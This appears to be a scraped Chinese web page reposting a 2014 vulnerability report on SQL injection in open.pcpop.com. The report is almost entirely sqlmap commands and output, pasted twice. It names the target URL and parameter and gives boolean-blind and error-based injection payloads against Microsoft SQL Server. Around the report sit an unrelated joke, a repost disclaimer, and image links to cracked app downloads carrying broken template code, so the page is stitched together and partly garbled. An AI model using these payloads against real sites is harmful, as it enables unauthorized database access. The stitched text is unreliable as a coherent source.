2014-06-07:细节已通知厂商并且等待厂商处理中
2014-06-12:厂商已经主动忽略漏洞,细节向公众公开
有一次跟一女同事喝酒聚会,喝完女同事也醉了说想让我晚上陪她睡,我听完后一巴掌扇过去了,把她一人留在那,我想她肯定是想趁我睡着的时候偷我兜里的两百块钱,真没想到她是这种人,我呸!还好我机智!
详细说明:
D:\Python27\sqlmap>sqlmap.py -u "http://open.pcpop.com/Ajax_EbWorthBuyingProdu
.aspx?subCategorySN=005500045"
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutu
consent is illegal. It is the end user's responsibility to obey all applicabl
local, state and federal laws. Developers assume no liability and are not resp
sible for any misuse or damage caused by this program
[*] starting at 00:36:47
[00:36:47] [WARNING] using 'C:\Users\90sec.AY130725124701Z.000\.sqlmap\output'
s the output directory
[00:36:48] [INFO] resuming back-end DBMS 'microsoft sql server'
[00:36:48] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) req
sts:
---
Place: GET
Parameter: subCategorySN
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: subCategorySN=005900167') AND 2944=2944 AND ('vGUP'='vGUP
Type: error-based
Title: Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause
IN)
Payload: subCategorySN=-7753') OR 3202 IN ((CHAR(113)+CHAR(108)+CHAR(122)+
AR(111)+CHAR(113)+(SELECT (CASE WHEN (3202=3202) THEN CHAR(49) ELSE CHAR(48) E
))+CHAR(113)+CHAR(97)+CHAR(97)+CHAR(121)+CHAR(113))) AND ('AVcb'='AVcb
---
[00:36:48] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000
D:\Python27\sqlmap>sqlmap.py -u "http://open.pcpop.com/Ajax_EbWorthBuyingProdu
.aspx?subCategorySN=005500045"
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutu
consent is illegal. It is the end user's responsibility to obey all applicabl
local, state and federal laws. Developers assume no liability and are not resp
sible for any misuse or damage caused by this program
[*] starting at 00:36:47
[00:36:47] [WARNING] using 'C:\Users\90sec.AY130725124701Z.000\.sqlmap\output'
s the output directory
[00:36:48] [INFO] resuming back-end DBMS 'microsoft sql server'
[00:36:48] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) req
sts:
---
Place: GET
Parameter: subCategorySN
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: subCategorySN=005900167') AND 2944=2944 AND ('vGUP'='vGUP
Type: error-based
Title: Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause
IN)
Payload: subCategorySN=-7753') OR 3202 IN ((CHAR(113)+CHAR(108)+CHAR(122)+
AR(111)+CHAR(113)+(SELECT (CASE WHEN (3202=3202) THEN CHAR(49) ELSE CHAR(48) E
))+CHAR(113)+CHAR(97)+CHAR(97)+CHAR(121)+CHAR(113))) AND ('AVcb'='AVcb
---
[00:36:48] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000
版权声明:转载请注明来源 Lonely@乌云 漏洞回应 厂商回应:
危害等级:无影响厂商忽略
忽略时间:2014-06-07 11:37
厂商回复: 最新状态:暂无
版权与免责声明:
凡注明稿件来源的内容均为转载稿或由网友用户注册发布,本网转载出于传递更多信息的目的;如转载稿涉及版权问题,请作者联系我们,同时对于用户评论等信息,本网并不意味着赞同其观点或证实其内容的真实性;

![英雄棋士团(预下载)?=$bqr['banben']?>](http://shouyouimg.cnzzla.com/d/file/shouyoupic/yingxiongqishituanyuxiazai.jpg)
![美食小当家?=$bqr['banben']?>](http://shouyouimg.cnzzla.com/d/file/shouyoupic/meishixiaodangjia.png)
![2047?=$bqr['banben']?>](http://shouyouimg.cnzzla.com/d/file/shouyoupic/2047.jpg)
![荣誉指挥官(预下载)?=$bqr['banben']?>](http://shouyouimg.cnzzla.com/d/file/shouyoupic/rongyuzhihuiguanyuxiazai.png)
![繁荣美食市场物语?=$bqr['banben']?>](http://shouyouimg.cnzzla.com/d/file/shouyoupic/fanrongmeishishichangwuyu.jpg)
![夸克浏览器 v4.2.1.138 好用的手机浏览器?=$bqr['banben']?>](http://shouyouimg.cnzzla.com/d/file/appimg/202007/kuakezuolanqi.jpg)
![移动办公软件 OfficeSuite Premium v10.18.28716 内购解锁版?=$bqr['banben']?>](http://shouyouimg.cnzzla.com/d/file/appimg/202007/yidongbangongruanjian.jpg)
![乐秀视频编辑器 VideoShow v8.8.4 内购解锁版?=$bqr['banben']?>](http://shouyouimg.cnzzla.com/d/file/appimg/202007/lexiushipinbianjiqi.png)
![X 浏览器 v3.3.9 一款小巧的安卓浏览器?=$bqr['banben']?>](http://shouyouimg.cnzzla.com/d/file/appimg/202007/x.jpg)
![安卓密码管理软件 Enpass v6.4.5.368 内购解锁版?=$bqr['banben']?>](http://shouyouimg.cnzzla.com/d/file/appimg/202007/anzhuomimaguanliruanjian.jpg)
![差分复制同步 FastCopy-M v3.6.3.51 绿色便携版?=$bqr['banben']?>](http://shouyouimg.cnzzla.com/d/file/softimg/FastCopy3.png)
![多标签页拓展 Clover v3.5.2 Build 19809 精简绿色版?=$bqr['banben']?>](http://shouyouimg.cnzzla.com/d/file/softimg/Clover.png)
![文件重命名 Advanced Renamer v3.85 Lite 绿色便携版?=$bqr['banben']?>](http://shouyouimg.cnzzla.com/d/file/softimg/Advanced_Renamer.png)
![网络防火监控 GlassWire Elite v2.1.166 绿色便携版?=$bqr['banben']?>](http://shouyouimg.cnzzla.com/d/file/softimg/GlassWire.png)
![影音播放器 Daum Potplayer v1.7.20538 美化便携版?=$bqr['banben']?>](http://shouyouimg.cnzzla.com/d/file/softimg/PotPlayer.png)